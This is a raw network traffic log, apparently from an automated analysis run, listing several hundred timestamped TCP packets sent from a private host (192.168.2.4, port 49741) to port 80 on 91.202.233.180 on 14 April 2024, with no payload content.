Apr 14, 2024 08:45:42.106245041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106270075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106292009 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106312037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106333017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106360912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106384993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106405973 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106427908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106487036 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106501102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106543064 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106568098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106590986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106614113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106637001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106673956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106690884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106719971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106755018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106777906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106803894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106825113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106865883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106890917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106914997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106936932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106957912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.106978893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107000113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107028008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107175112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107199907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107215881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107247114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107261896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107290030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107315063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107336998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107356071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107378960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107402086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107417107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107434034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107456923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107479095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107501984 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107753992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107770920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107804060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107856989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107880116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107902050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107924938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107945919 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107966900 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.107981920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108009100 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108083010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108108044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108129025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108150005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108172894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.108196020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116503000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116503000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116503000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116503000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116503000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116503000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116579056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116579056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116579056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116624117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116646051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116661072 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116686106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116700888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116728067 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116743088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116816044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116816998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116832972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116851091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116869926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116888046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116911888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116962910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116976023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.116995096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.117024899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.117038965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.117075920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.117104053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125478983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125479937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125479937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125479937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125479937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125591993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125591993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125591993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125591993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.125622988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.132411957 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.132982016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.132982969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.132982969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.132982969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.132982969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133085966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133085966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133085966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133157969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133177996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133210897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133234024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133264065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133286953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133310080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133343935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133362055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133402109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133466005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133485079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133519888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133543968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133641005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133641958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133672953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133690119 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133723021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133743048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133776903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133796930 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133826017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133846998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133878946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133902073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133933067 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133949995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.133990049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134010077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134030104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134048939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134082079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134102106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134126902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134154081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134172916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134197950 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134218931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134241104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134264946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134290934 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134308100 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134339094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134356976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134388924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134408951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134432077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134449005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134475946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134495974 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134521961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134541035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134563923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134592056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134619951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134638071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134664059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134679079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134708881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134735107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134759903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134779930 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134803057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134823084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134849072 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134874105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134902954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134912968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134942055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134960890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.134987116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135019064 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135046959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135066986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135092020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135112047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135139942 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135155916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135183096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135202885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135229111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135246992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135270119 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135293007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135319948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135339022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135366917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135387897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135409117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135431051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135453939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135473967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135498047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135535002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135560036 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135581017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135606050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135626078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135654926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135677099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135701895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135720968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135746002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135762930 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135792017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135811090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135835886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135859966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135886908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135907888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135931015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135951042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135981083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.135992050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136019945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136042118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136068106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136085033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136111021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136131048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136154890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136177063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136202097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136228085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136248112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136261940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136290073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136312008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136341095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136360884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136384010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136404991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136430979 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136444092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136472940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136492968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136519909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136539936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136564016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136593103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136615038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136636019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136660099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136679888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136707067 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136727095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136749029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136771917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136794090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136847019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136847019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136857033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136884928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136904955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136928082 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136949062 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136975050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.136993885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137022018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137042046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137065887 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137079954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137109041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137128115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137154102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137177944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137203932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137224913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137248993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137267113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137290001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137310028 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137340069 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137361050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137384892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137404919 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137449026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137449026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137473106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137494087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137520075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137537956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137562037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137584925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137612104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137629986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137653112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137672901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137700081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137718916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137742996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137763023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137792110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137809992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137835026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137855053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137878895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137897968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137922049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137942076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137968063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.137986898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138011932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138032913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138057947 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138077021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138104916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138132095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138190985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138211012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138248920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138269901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138295889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138317108 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138437986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138458967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138484955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138505936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.138530016 CEST	49741	80	192.168.2.4	91.202.233.180
